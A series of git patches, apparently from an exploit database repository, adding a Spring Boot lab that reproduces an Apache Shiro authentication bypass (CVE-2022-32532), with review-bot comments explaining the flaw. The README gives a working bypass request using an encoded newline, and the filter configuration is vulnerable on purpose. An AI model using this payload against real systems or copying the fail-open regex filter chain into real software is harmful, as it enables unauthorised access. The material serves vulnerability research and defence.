- public MyShiroFilterFactoryBean() {
- super();
- }
-
- @Override
- protected AbstractShiroFilter createInstance() {
- SecurityManager securityManager = this.getSecurityManager();
- FilterChainManager manager = new DefaultFilterChainManager();
- manager.addFilter("myFilter",new MyFilter());
- // my filter
- manager.addToChain("/permit/.*", "myFilter");
- // todo: add other filters
-
- PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver();
- chainResolver.setFilterChainManager(manager);
- // set RegExPatternMatcher
- chainResolver.setPathMatcher(new RegExPatternMatcher());
- return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver);
- }
-
- static class SpringShiroFilter extends AbstractShiroFilter {
- protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) {
- this.setSecurityManager(webSecurityManager);
- this.setFilterChainResolver(resolver);
- }
- }
-}
-
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
deleted file mode 100644
index 30a0f1b5..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
+++ /dev/null
@@ -1,22 +0,0 @@
-package com.example.shirodemo;
-
-import org.apache.shiro.mgt.SecurityManager;
-import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
-import org.springframework.context.annotation.Bean;
-import org.springframework.context.annotation.Configuration;
-
-@Configuration
-public class ShiroConfig {
-
- @Bean
- public SecurityManager securityManager() {
- return new DefaultWebSecurityManager();
- }
-
- @Bean
- public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) {
- MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean();
- shiroFilterFactoryBean.setSecurityManager(securityManager);
- return shiroFilterFactoryBean;
- }
-}
\ No newline at end of file
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
deleted file mode 100644
index 5d4615bd..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
+++ /dev/null
@@ -1,13 +0,0 @@
-package com.example.shirodemo;
-
-import org.springframework.boot.SpringApplication;
-import org.springframework.boot.autoconfigure.SpringBootApplication;
-
-@SpringBootApplication
-public class ShiroDemoApplication {
-
- public static void main(String[] args) {
- SpringApplication.run(ShiroDemoApplication.class, args);
- }
-
-}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
deleted file mode 100644
index e69de29b..00000000
--
Gitee
From fb13fb7a97443080d615d7545ff19cdd0e751291 Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 11:59:34 +0800
Subject: [PATCH 05/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.idea/workspace.xml | 60 +++++++++++++++++++++++++++++++++++++++++++++
openkylin_list.yaml | 4 ++-
2 files changed, 63 insertions(+), 1 deletion(-)
create mode 100644 .idea/workspace.xml
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
new file mode 100644
index 00000000..1723fab4
--- /dev/null
+++ b/.idea/workspace.xml
@@ -0,0 +1,60 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1681355429624
+
+
+ 1681355429624
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 76b55ee1..5d5c89dd 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -40,7 +40,9 @@ cve:
apache-unomi:
- CVE-2020-13942
apache-struts:
- - CVE-2019-0230
+ - CVE-2019-0230
+ apache-Shiro:
+ - CVE-2022-32532
Influx-DB:
- CVE-2019-20933
linux-kernel:
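Review bot: The `- CVE-2019-0230` line is removed and re-added with no visible difference, which usually means a whitespace or line-ending change. Since indentation is significant in YAML, please confirm the item still nests under `apache-struts` and that the new `apache-Shiro:` key sits at the same level as its siblings; indentation is not visible in this view. The key's capitalisation also differs from the neighbouring `apache-unomi` and `apache-struts`; if it has to match the `cve/apache-Shiro/` directory, a short comment saying so would keep tooling that does case-sensitive lookups from drifting.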
--
Gitee
From 5803165d660b38c7d42ead80ea208ceb60c1de2e Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 12:00:33 +0800
Subject: [PATCH 06/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.idea/workspace.xml | 60 ---------------------------------------------
1 file changed, 60 deletions(-)
delete mode 100644 .idea/workspace.xml
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
deleted file mode 100644
index 1723fab4..00000000
--- a/.idea/workspace.xml
+++ /dev/null
@@ -1,60 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1681355429624
-
-
- 1681355429624
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
--
Gitee
From cc9575e7f049b64ffc081703e1d14d64397e85dc Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 14:04:20 +0800
Subject: [PATCH 07/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../inspectionProfiles/profiles_settings.xml | 6 ++
.idea/misc.xml | 4 ++
.idea/modules.xml | 8 +++
.idea/openkylin-exploit-db.iml | 12 ++++
.idea/vcs.xml | 7 +++
.idea/workspace.xml | 59 +++++++++++++++++++
6 files changed, 96 insertions(+)
create mode 100644 .idea/inspectionProfiles/profiles_settings.xml
create mode 100644 .idea/misc.xml
create mode 100644 .idea/modules.xml
create mode 100644 .idea/openkylin-exploit-db.iml
create mode 100644 .idea/vcs.xml
create mode 100644 .idea/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
new file mode 100644
index 00000000..105ce2da
--- /dev/null
+++ b/.idea/inspectionProfiles/profiles_settings.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
new file mode 100644
index 00000000..dc9ea490
--- /dev/null
+++ b/.idea/misc.xml
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
new file mode 100644
index 00000000..f36de21d
--- /dev/null
+++ b/.idea/modules.xml
@@ -0,0 +1,8 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
new file mode 100644
index 00000000..8b8c3954
--- /dev/null
+++ b/.idea/openkylin-exploit-db.iml
@@ -0,0 +1,12 @@
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
new file mode 100644
index 00000000..24f4484d
--- /dev/null
+++ b/.idea/vcs.xml
@@ -0,0 +1,7 @@
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
new file mode 100644
index 00000000..97f7c091
--- /dev/null
+++ b/.idea/workspace.xml
@@ -0,0 +1,59 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1681355429624
+
+
+ 1681355429624
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
--
Gitee
From 1391ad827ee6462a8e67e7738760988ec3a19248 Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 14:09:05 +0800
Subject: [PATCH 08/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../inspectionProfiles/profiles_settings.xml | 6 --
.idea/misc.xml | 4 --
.idea/modules.xml | 8 ---
.idea/openkylin-exploit-db.iml | 12 ----
.idea/vcs.xml | 7 ---
.idea/workspace.xml | 59 -------------------
openkylin_list.yaml | 2 -
7 files changed, 98 deletions(-)
delete mode 100644 .idea/inspectionProfiles/profiles_settings.xml
delete mode 100644 .idea/misc.xml
delete mode 100644 .idea/modules.xml
delete mode 100644 .idea/openkylin-exploit-db.iml
delete mode 100644 .idea/vcs.xml
delete mode 100644 .idea/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
deleted file mode 100644
index 105ce2da..00000000
--- a/.idea/inspectionProfiles/profiles_settings.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
deleted file mode 100644
index dc9ea490..00000000
--- a/.idea/misc.xml
+++ /dev/null
@@ -1,4 +0,0 @@
-
-
-
-
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
deleted file mode 100644
index f36de21d..00000000
--- a/.idea/modules.xml
+++ /dev/null
@@ -1,8 +0,0 @@
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
deleted file mode 100644
index 8b8c3954..00000000
--- a/.idea/openkylin-exploit-db.iml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
deleted file mode 100644
index 24f4484d..00000000
--- a/.idea/vcs.xml
+++ /dev/null
@@ -1,7 +0,0 @@
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
deleted file mode 100644
index 97f7c091..00000000
--- a/.idea/workspace.xml
+++ /dev/null
@@ -1,59 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1681355429624
-
-
- 1681355429624
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 5d5c89dd..6202811e 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -41,8 +41,6 @@ cve:
- CVE-2020-13942
apache-struts:
- CVE-2019-0230
- apache-Shiro:
- - CVE-2022-32532
Influx-DB:
- CVE-2019-20933
linux-kernel:
--
Gitee
From 1522f97d86ef2bc615b9780eb155c3ff3614fe21 Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 14:12:34 +0800
Subject: [PATCH 09/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
openkylin_list.yaml | 2 ++
1 file changed, 2 insertions(+)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 6202811e..5d5c89dd 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -41,6 +41,8 @@ cve:
- CVE-2020-13942
apache-struts:
- CVE-2019-0230
+ apache-Shiro:
+ - CVE-2022-32532
Influx-DB:
- CVE-2019-20933
linux-kernel:
--
Gitee
From 3b96418e1411bba72f872fe206d135f82202a7fd Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 14:25:01 +0800
Subject: [PATCH 10/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../inspectionProfiles/profiles_settings.xml | 6 ++
.idea/misc.xml | 4 +
.idea/modules.xml | 8 ++
.idea/openkylin-exploit-db.iml | 12 +++
.idea/vcs.xml | 7 ++
.idea/workspace.xml | 77 +++++++++++++++++++
6 files changed, 114 insertions(+)
create mode 100644 .idea/inspectionProfiles/profiles_settings.xml
create mode 100644 .idea/misc.xml
create mode 100644 .idea/modules.xml
create mode 100644 .idea/openkylin-exploit-db.iml
create mode 100644 .idea/vcs.xml
create mode 100644 .idea/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
new file mode 100644
index 00000000..105ce2da
--- /dev/null
+++ b/.idea/inspectionProfiles/profiles_settings.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
new file mode 100644
index 00000000..dc9ea490
--- /dev/null
+++ b/.idea/misc.xml
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
new file mode 100644
index 00000000..f36de21d
--- /dev/null
+++ b/.idea/modules.xml
@@ -0,0 +1,8 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
new file mode 100644
index 00000000..8b8c3954
--- /dev/null
+++ b/.idea/openkylin-exploit-db.iml
@@ -0,0 +1,12 @@
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
new file mode 100644
index 00000000..24f4484d
--- /dev/null
+++ b/.idea/vcs.xml
@@ -0,0 +1,7 @@
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
new file mode 100644
index 00000000..d26ad8c9
--- /dev/null
+++ b/.idea/workspace.xml
@@ -0,0 +1,77 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {
+ "keyToString": {
+ "ASKED_ADD_EXTERNAL_FILES": "true",
+ "ASKED_SHARE_PROJECT_CONFIGURATION_FILES": "true",
+ "RunOnceActivity.OpenProjectViewOnStart": "true",
+ "RunOnceActivity.ShowReadmeOnStart": "true"
+ }
+}
+
+
+
+
+ 1681355429624
+
+
+ 1681355429624
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
--
Gitee
From cc1dbae9205103c84e3fa32583cc011c20f3cb84 Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 14:25:16 +0800
Subject: [PATCH 11/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../inspectionProfiles/profiles_settings.xml | 6 --
.idea/misc.xml | 4 -
.idea/modules.xml | 8 --
.idea/openkylin-exploit-db.iml | 12 ---
.idea/vcs.xml | 7 --
.idea/workspace.xml | 77 -------------------
6 files changed, 114 deletions(-)
delete mode 100644 .idea/inspectionProfiles/profiles_settings.xml
delete mode 100644 .idea/misc.xml
delete mode 100644 .idea/modules.xml
delete mode 100644 .idea/openkylin-exploit-db.iml
delete mode 100644 .idea/vcs.xml
delete mode 100644 .idea/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
deleted file mode 100644
index 105ce2da..00000000
--- a/.idea/inspectionProfiles/profiles_settings.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
deleted file mode 100644
index dc9ea490..00000000
--- a/.idea/misc.xml
+++ /dev/null
@@ -1,4 +0,0 @@
-
-
-
-
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
deleted file mode 100644
index f36de21d..00000000
--- a/.idea/modules.xml
+++ /dev/null
@@ -1,8 +0,0 @@
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
deleted file mode 100644
index 8b8c3954..00000000
--- a/.idea/openkylin-exploit-db.iml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
deleted file mode 100644
index 24f4484d..00000000
--- a/.idea/vcs.xml
+++ /dev/null
@@ -1,7 +0,0 @@
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
deleted file mode 100644
index d26ad8c9..00000000
--- a/.idea/workspace.xml
+++ /dev/null
@@ -1,77 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- {
- "keyToString": {
- "ASKED_ADD_EXTERNAL_FILES": "true",
- "ASKED_SHARE_PROJECT_CONFIGURATION_FILES": "true",
- "RunOnceActivity.OpenProjectViewOnStart": "true",
- "RunOnceActivity.ShowReadmeOnStart": "true"
- }
-}
-
-
-
-
- 1681355429624
-
-
- 1681355429624
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
--
Gitee
From a8652da8bd63657eb6908348eeeb495454d279ff Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 14:44:37 +0800
Subject: [PATCH 12/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/apache-Shiro/2022/CVE-2022-32532 | 1 -
.../2022/CVE-2022-32532/.gitignore | 33 +++++++++++++++
.../2022/CVE-2022-32532/README.md | 35 ++++++++++++++++
cve/apache-Shiro/2022/CVE-2022-32532/pom.xml | 38 ++++++++++++++++++
.../com/example/shirodemo/DemoController.java | 21 ++++++++++
.../java/com/example/shirodemo/MyFilter.java | 35 ++++++++++++++++
.../shirodemo/MyShiroFilterFactoryBean.java | 40 +++++++++++++++++++
.../com/example/shirodemo/ShiroConfig.java | 22 ++++++++++
.../shirodemo/ShiroDemoApplication.java | 13 ++++++
.../src/main/resources/application.properties | 0
10 files changed, 237 insertions(+), 1 deletion(-)
delete mode 160000 cve/apache-Shiro/2022/CVE-2022-32532
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/README.md
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532 b/cve/apache-Shiro/2022/CVE-2022-32532
deleted file mode 160000
index 58c03400..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 58c03400ee5ad0fa4bd8b5d1908c750b6c42a34b
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
new file mode 100644
index 00000000..549e00a2
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
@@ -0,0 +1,33 @@
+HELP.md
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### STS ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### IntelliJ IDEA ###
+.idea
+*.iws
+*.iml
+*.ipr
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/README.md b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
new file mode 100644
index 00000000..975b0366
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
@@ -0,0 +1,35 @@
+# CVE-2022-32532
+
+## about
+
+This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532).
+
+In fact, there are more ways to exploit it, as long as developers use `RegExPatternMatcher`, there will be a possible bypass vulnerability.
+
+## introduce
+
+Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under `/permit`
+
+This request can succeed
+```http request
+GET /permit/any HTTP/1.1
+Token: 4ra1n
+```
+
+Access is not allowed when there is no token request header
+```http request
+GET /permit/any HTTP/1.1
+```
+
+It can be bypassed in a simple way in special but common configurations
+```http request
+GET /permit/a%0any HTTP/1.1
+```
+
+## reference
+
+https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
+
+This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978)
+
+Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher)
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
new file mode 100644
index 00000000..5210b547
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
@@ -0,0 +1,38 @@
+
+
+ 4.0.0
+
+ org.springframework.boot
+ spring-boot-starter-parent
+ 2.7.0
+
+
+ com.example
+ shiro-demo
+ 0.0.1-SNAPSHOT
+ shiro-demo
+ CVE-2022-32532
+
+ 1.8
+
+
+
+ org.springframework.boot
+ spring-boot-starter-web
+
+
+ org.apache.shiro
+ shiro-spring
+ 1.9.0
+
+
+
+
+
+ org.springframework.boot
+ spring-boot-maven-plugin
+
+
+
+
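Review bot: The `shiro-spring` dependency is pinned to `1.9.0` with no comment saying the pin is deliberate, and the project description is only the CVE id. This is presumably the affected release the demo needs, so a later dependency bump would quietly stop the project from reproducing the issue. Copying this pom into another project would carry the affected version along. I would put a comment directly above the dependency, such as `<!-- Intentionally pinned to a Shiro release affected by CVE-2022-32532; lab use only, do not reuse -->`. The XML markup of this hunk is not visible on the page, so the exact placement needs checking against the real file.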
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
new file mode 100644
index 00000000..fd71b1a0
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
@@ -0,0 +1,21 @@
+package com.example.shirodemo;
+
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class DemoController {
+ @RequestMapping(path = "/permit/{value}")
+ public String permit(@PathVariable String value) {
+ System.out.println("success!");
+ return "success";
+ }
+
+ // Another Bypass
+ // @RequestMapping(path = "/permit/*")
+ public String permit() {
+ System.out.println("success!");
+ return "success";
+ }
+}
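Review bot: The second `permit()` overload stays public inside a `@RestController` while its `@RequestMapping(path = "/permit/*")` is commented out, so as committed it is dead code. The only explanation is `// Another Bypass`. Either remove it or document it as a switchable lab variant, for example `// Lab variant: enable this mapping instead of the one above to reproduce the second case; unmapped as committed`. The mapped `permit(String value)` never uses `value`, and both methods print through `System.out.println`. A logger would make the demo's output easier to correlate with the filter's deny messages.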
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
new file mode 100644
index 00000000..beaf98ae
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
@@ -0,0 +1,35 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.util.RegExPatternMatcher;
+import org.apache.shiro.web.filter.AccessControlFilter;
+
+import javax.servlet.ServletRequest;
+import javax.servlet.ServletResponse;
+import javax.servlet.http.HttpServletRequest;
+import java.io.IOException;
+
+public class MyFilter extends AccessControlFilter {
+
+ public MyFilter(){
+ super();
+ this.pathMatcher = new RegExPatternMatcher();
+ }
+
+ @Override
+ protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
+ String token = ((HttpServletRequest)request).getHeader("Token");
+ // todo: check permission ...
+ return token != null && token.equals("4ra1n");
+ }
+
+ @Override
+ protected boolean onAccessDenied(ServletRequest request, ServletResponse response) {
+ System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI());
+ try {
+ response.getWriter().println("access denied");
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ return false;
+ }
+}
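Review bot: `onAccessDenied` writes "access denied" to the body but never sets a status, so a rejected request is presumably answered with the default 200. That makes denied and allowed requests indistinguishable in access logs and to any monitoring keyed on status codes. Inside the existing `try`, I would replace the `println` with `((HttpServletResponse) response).sendError(HttpServletResponse.SC_FORBIDDEN, "access denied");`, which needs an import of `javax.servlet.http.HttpServletResponse`. In `isAccessAllowed` the token is compared against the hard-coded literal `"4ra1n"`. The `// todo: check permission ...` line should say explicitly that this stands in for real authentication and must not be copied. `e.printStackTrace()` in the catch would be better as a logged error.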
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
new file mode 100644
index 00000000..d24431e4
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
@@ -0,0 +1,40 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.util.RegExPatternMatcher;
+import org.apache.shiro.web.filter.mgt.*;
+import org.apache.shiro.web.mgt.WebSecurityManager;
+import org.apache.shiro.web.servlet.AbstractShiroFilter;
+
+
+public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean {
+
+ public MyShiroFilterFactoryBean() {
+ super();
+ }
+
+ @Override
+ protected AbstractShiroFilter createInstance() {
+ SecurityManager securityManager = this.getSecurityManager();
+ FilterChainManager manager = new DefaultFilterChainManager();
+ manager.addFilter("myFilter",new MyFilter());
+ // my filter
+ manager.addToChain("/permit/.*", "myFilter");
+ // todo: add other filters
+
+ PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver();
+ chainResolver.setFilterChainManager(manager);
+ // set RegExPatternMatcher
+ chainResolver.setPathMatcher(new RegExPatternMatcher());
+ return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver);
+ }
+
+ static class SpringShiroFilter extends AbstractShiroFilter {
+ protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) {
+ this.setSecurityManager(webSecurityManager);
+ this.setFilterChainResolver(resolver);
+ }
+ }
+}
+
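Review bot: The comment `// set RegExPatternMatcher` in `createInstance()` does not say that this line, together with the `"/permit/.*"` chain, is the deliberately vulnerable part of the demo. In Java regular expressions `.` does not match line terminators unless DOTALL is enabled, so a path containing one matches no chain. Because no other chain is registered, such a request goes on without `myFilter`, which means the configuration fails open. I would replace the comment with `// Intentionally vulnerable (CVE-2022-32532): '.' does not match line terminators, so such paths match no chain and skip myFilter`. A hardened variant would upgrade Shiro and add a catch-all deny chain. Separately, the `(WebSecurityManager) securityManager` cast is unchecked, and an `instanceof` test with a descriptive exception would fail more clearly than a `ClassCastException`.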
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
new file mode 100644
index 00000000..30a0f1b5
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
@@ -0,0 +1,22 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+
+@Configuration
+public class ShiroConfig {
+
+ @Bean
+ public SecurityManager securityManager() {
+ return new DefaultWebSecurityManager();
+ }
+
+ @Bean
+ public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) {
+ MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean();
+ shiroFilterFactoryBean.setSecurityManager(securityManager);
+ return shiroFilterFactoryBean;
+ }
+}
\ No newline at end of file
